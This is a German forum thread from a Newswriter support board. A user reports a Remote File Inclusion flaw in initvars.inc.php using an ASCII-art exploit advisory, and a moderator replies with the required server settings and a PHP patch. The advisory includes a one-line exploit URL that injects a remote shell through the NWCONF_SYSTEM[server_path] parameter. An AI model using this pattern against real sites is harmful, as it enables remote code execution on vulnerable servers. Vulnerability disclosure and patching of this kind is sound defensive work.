Baumstrukturmodus | Linearer Modus

Darkskill · 21.01.2009, 06:35 AM

Hallo bitte so schnell wie möglich fixxen da ich leider keine supportmail oder sowas gefunden habe muss ich das leider hier adden

Code:

################################################################################​##############################

#                             **           ****   ****          ******                                       #

#                            ***          */// * */// *        //////*                                       #

#                           //**  **   **/    /*/    /* **   **     /*                                       #

#                            /** //** **    ***    *** //** **      *                                        #

#                            /**  //***    /// *  /// * //***      *                                         #

#                            /**   **/**  *   /* *   /*  **/**    *                                          #

#                            **** ** //**/ **** / ****  ** //**  *                                           #

#                           //// //   //  ////   ////  //   //  /                                            #

################################################################################​##############################

#                          ??           PROUDLY TO PRESENT:         ???                                      #

#            ? ?? ????????????????????????????????????????????????????????????????????? ?? ?                 #

#                          Newswriter v1.x (initvars.inc.php) Remote File Inclusion                          #

#            ? ?? ????????????????????????????????????????????????????????????????????? ?? ?                 #

#             ????????  [ SUPPLiER ..................................... 1x33x7            ]  ????????       #

#             ???????   [ Founder ...................................... Bloodman          ]   ???????       #

#             ??????    [ Company/Coder ................................ faqboard???       ]    ??????       #

#             ?????     [ Web-Script ................................... Newswriter v1.x   ]     ?????       #

#             ????      [ Bug .......................................... RFI               ]      ????       #

#             ???       [ Security Risk ................................ Very High         ]       ???       #

#             ???       [ RELEASE DATE ................................. 2009-01-21        ]        ??       #

#             ??????           ?????            Bug/Info:           ?????            ??????                  #

#        ?????                                Hello guys,                                        ?????       #

#       ????? I found a Remote File Inclusion Bug in Newswriter SW 1.x the                       ?????       #

#       ????? php file initvars.inc.php produce an error and will give you                       ?????       #

#       ????? something like this :                                                              ?????       #

#       ????? Warning: main(): Failed opening 'language/.lang' for inclusion (include_path='.')  ?????       #

#       ????? in /srv/www/htdocs/web344/html/news/include/initvars.inc.php on line 142           ?????       #

#       ????? Error loading language file                                                        ?????       #

#       ?????                                                                                    ?????       #

#       ?????   This Remote File Iclusion should work on all Newswriter v1.x test your version   ?????       #

#       ?????                                    Bug :                                           ?????       #

#       ?????              /news/include/initvars.inc.php?NWCONF_SYSTEM[server_path]=            ?????       #

#       ?????                                Exploit :                                           ?????       #

#       ????? www.victim.com/news/include/initvars.inc.php?NWCONF_SYSTEM[server_path]=SHELL      ?????       #

#       ?????                                   Dork :                                           ?????       #

#       ?????                         find your own dork to find Newswriter                      ?????       #

#            ?????                                                                          ?????            #

#             ??????           ?????            Gr33tz:             ?????            ??????                  #

#            ??????? ???           - all 1x33x7 members                          ??? ???????                 #

#            ??????? ???           - all XSS-Crew members                        ??? ???????                 #

#            ??????? ???           - all uNkn0wn members                         ??? ???????                 #

#            ??????? ???           - all ratnetwork members                      ??? ???????                 #

#            ??????? ???           - all others i forgot :)                      ??? ???????                 #

#            ??????           ?????         Special Gr33tz:         ?????            ??????                  #

#            ??????? ???           - Baba,Apu,Madda,Willi,S0l1d,                 ??? ???????                 #

#            ??????? ???             Ic3Drag0n,Fink,iD,Bronco,Rat                ??? ???????                 #

#            ??????? ???             All other i have forgot :)                  ??? ???????                 #

#            ??????? ???                                                         ??? ???????                 #

#              ????   ?????????                                           ?????????   ????                   #

#                    ????   ?????????                               ?????????   ????                         #

#                         ????    ?????????                     ?????????   ????                             #

#                                ????   ????????? BYE ALL ?????????   ????                                   #

################################################################################​##############################

wünsche noch einen schönen tag Smile

***basti*** · (Dieser Beitrag wurde zuletzt bearbeitet: 23.01.2009 08:17 AM von basti.)

Verschoben weil: Wenn dann ist es ein Bug und keine News.

***basti*** · 24.01.2009, 15:57 PM

Zum Bug: Das ganze funktioniert natürlich nur, wenn url_fopen = on ist und register_globals = on.
Bitte folgendes in die initvars.inc.php einfügen:

Zitat:if(!defined('HAUPTSEITE')) {
header("Location: ../index.php");
exit;
}

Damit ist das dann kein Problem mehr.

Möglicherweise verwandte Themen...
Thema:		Verfasser	Antworten:	Ansichten:	Letzter Beitrag
	Funktion newswriter() in index.php von Version 1.43	wurzer	5	14,981	04.02.2009 19:21 PM Letzter Beitrag: basti
	Sonderzeichen Fehler im Newswriter !	elacqua	9	17,839	04.03.2007 18:58 PM Letzter Beitrag: cappo
	Phishing-Seiten über Newswriter?	Mana	2	6,416	11.02.2007 22:30 PM Letzter Beitrag: basti
	Problem mit Newswriter	MauTom	17	26,128	13.01.2006 12:36 PM Letzter Beitrag: kkoehne
	Probleme mit der Textformatierung im Newswriter-Editor	Ludinator	2	6,137	03.08.2005 06:41 AM Letzter Beitrag: basti
	NewsWriter 1.4 - Adminbereich -> Optionen	Buddy Hollyday	2	5,732	05.09.2004 11:08 AM Letzter Beitrag: basti
	Newswriter 1.4 Admin Bereich	Ewald	2	6,045	17.08.2004 20:49 PM Letzter Beitrag: basti
	Newswriter Newsletter funzt nicht!	paelzersebbi	2	5,862	28.05.2004 09:23 AM Letzter Beitrag: basti
	[Newswriter 1.2] Rubriken nicht mehr mögich	Screw Driver	14	21,859	16.10.2003 10:13 AM Letzter Beitrag: kai_